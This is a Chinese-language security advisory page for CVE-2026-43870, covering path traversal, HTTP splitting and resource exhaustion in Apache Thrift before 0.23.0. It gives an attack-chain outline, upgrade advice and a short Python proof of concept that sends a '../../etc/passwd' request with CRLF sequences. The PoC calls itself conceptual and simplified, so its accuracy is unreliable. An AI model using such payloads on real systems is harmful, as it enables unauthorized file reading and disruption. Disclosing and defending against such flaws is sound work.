CVE-2026-43870 CVSS 7.3 高危

CVE-2026-43870: Apache Thrift 多个高危漏洞

披露日期: 2026-05-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-43870

漏洞类型

路径遍历, HTTP请求拆分, 资源耗尽

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Apache Thrift

漏洞概述

Apache Thrift 在 0.23.0 之前的版本中存在多个安全漏洞，包括源验证错误、路径遍历、HTTP 请求/响应拆分以及未控制的资源消耗。攻击者无需认证和用户交互即可通过网络利用这些漏洞，导致信息泄露、完整性受损或服务拒绝。

技术细节

该漏洞主要由于 Apache Thrift 在处理请求时缺乏严格的输入验证和资源限制。攻击者可以构造包含路径遍历符（如 ../）的请求读取受限目录外的文件；利用 CRLF 序列注入进行 HTTP 请求/响应拆分攻击，篡改缓存或进行 XSS 攻击；此外，特定的请求模式可导致服务器资源耗尽。CVSS 3.1 评分为 7.3，攻击向量为网络，无需权限，影响机密性、完整性和可用性。

攻击链分析

STEP 1

1. 侦察

攻击者扫描网络，识别出运行 Apache Thrift 且版本低于 0.23.0 的目标服务。

STEP 2

2. 制作载荷

攻击者构造包含路径遍历字符（../）或 CRLF 序列（\r\n）的恶意数据包。

STEP 3

3. 发送请求

攻击者通过网络向目标 Thrift 服务端口发送特制的恶意请求，无需认证。

STEP 4

4. 触发漏洞

目标服务器解析请求时，由于验证不足，执行了路径跳转或头部注入操作。

STEP 5

5. 达成目的

成功读取敏感文件、篡改 HTTP 响应或导致服务器资源耗尽拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket

# Conceptual PoC for Path Traversal / HTTP Splitting in Apache Thrift
# Target: Apache Thrift server < 0.23.0

target_host = "127.0.0.1"
target_port = 9090

# Malicious payload attempt
# Note: Actual Thrift protocol framing is binary, this is a simplified conceptual representation
# of a payload that might trigger a parser issue if validation is missing.

payload = b"\x00\x00\x00\x2b" + b"POST /api/../../etc/passwd HTTP/1.1\r\nHost: localhost\r\n\r\n"

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target_host, target_port))
    s.send(payload)
    response = s.recv(4096)
    print("Response received:")
    print(response.decode(errors='ignore'))
    s.close()
except Exception as e:
    print(f"Error: {e}")

影响范围

Apache Thrift < 0.23.0

防御指南

临时缓解措施

建议立即升级至 Apache Thrift 0.23.0。在无法立即升级的情况下，应在网络边界实施访问控制，仅允许可信 IP 地址访问 Thrift 端口，并密切监控服务器的资源消耗和异常流量。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表